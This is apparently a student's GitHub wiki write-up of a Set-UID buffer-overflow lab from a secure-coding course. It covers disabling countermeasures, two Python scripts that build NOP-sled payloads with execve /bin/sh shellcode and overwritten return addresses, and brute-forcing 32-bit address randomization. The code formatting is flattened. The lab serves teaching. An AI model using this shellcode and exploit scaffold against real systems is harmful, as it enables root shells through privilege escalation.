LAB ‐11 ‐ Buffer‐Overflow Attack Lab (Set‐UID Version) - archie-archana/securecodinglab GitHub Wiki
2.1 Turning Off Countermeasures
Address randomization - systems uses address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult, guessing addresses is one of the critical steps of buffer-overflow attacks
Task 3: Launching Attack on 32-bit Program
5.1 Investigation
**First breakpoint **
5.2 Launching Attacks
Task 4: Launching Attack without Knowing Buffer Size (Level 2)
##Task 5:
#!/usr/bin/python3 import sys
Replace this with the actual shellcode
shellcode = ( b"\x90\x90\x90\x90" + b"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e" b"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57" b"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05" )
replace with your shellcode
Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
Put the shellcode somewhere in the payload
start = 100 # Adjust this to the desired position in the payload content[start:start + len(shellcode)] = shellcode
Decide the return address value and put it somewhere in the payload
ret = 0x7fffffffd8c0 # Replace with the actual target return address offset = 216 # Adjust this to the desired offset within the payload L = 8 # Use 4 for 32-bit address and 8 for 64-bit address
Convert the return address to bytes and write it to the payload
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')
Print the payload
sys.stdout.buffer.write(content)
TASK-07
Defeating dash’s Countermeasure #!/usr/bin/python3 import sys
Replace the content with the actual shellcode
shellcode= ( "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31" "\xd2\x31\xc0\xb0\x0b\xcd\x80" ).encode('latin-1')
Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
Put the shellcode somewhere in the payload
start = 400 # Change this number content[start:start + len(shellcode)] = shellcode
Decide the return address value
and put it somewhere in the payload
ret = 0xffffcab8 + 200 # Change this number offset = 112 # Change this number
L = 4 # Use 4 for 32-bit address and 8 for 64-bit address content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') ##################################################################
Write the content to a file
with open('badfile', 'wb') as f: f.write(content)
TASK-8
Defeating Address Randomization On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524; 288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach.